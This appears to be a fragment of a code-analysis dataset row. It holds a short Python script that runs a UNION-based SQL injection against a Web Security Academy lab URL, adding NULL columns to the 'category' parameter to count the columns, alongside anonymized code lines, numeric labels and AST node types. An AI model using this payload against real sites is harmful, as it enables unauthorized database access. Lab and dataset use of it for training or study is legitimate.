"VAR_3['category'] = f\"Lifestyle{' '.join(VAR_2)}\"\n",
"VAR_8 = VAR_4.get(VAR_0, VAR_1=sqli)\n"
] | [
"import requests\n",
"import sys\n",
"from bs4 import BeautifulSoup\n",
"import re\n",
"url = 'https://abcd.web-security-academy.net/'\n",
"url = f'{url}page'\n",
"params = {'category': 'Lifestyle'}\n",
"null = [\"'UNION SELECT\", 'NULL', '--']\n",
"sqli = {'category': f\"Lifestyle{' '.join(null)}\"}\n",
"api_session = requests.Session()\n",
"response = api_session.get(url, params=params)\n",
"if response.status_code == 404:\n",
"sys.exit('The session you are looking for has expired')\n",
"def sqli_union_lab_1(null, sqli):...\n",
"\"\"\"docstring\"\"\"\n",
"lab1 = api_session.get(url, params=sqli)\n",
"while not lab1.ok:\n",
"null.remove('--')\n",
"print(f\"There are {null.count('NULL')} columns\")\n",
"null.extend([',', 'NULL', '--'])\n",
"return null\n",
"sqli['category'] = f\"Lifestyle{' '.join(null)}\"\n",
"lab1 = api_session.get(url, params=sqli)\n"
] | [
0,
0,
0,
4,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"Import'",
"Import'",
"ImportFrom'",
"Import'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"Expr'",
"FunctionDef'",
"Docstring",
"Assign'",
"Condition",
"Expr'",
"Expr'",
"Expr'",
"Return'",
"Assign'",
"Assign'"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.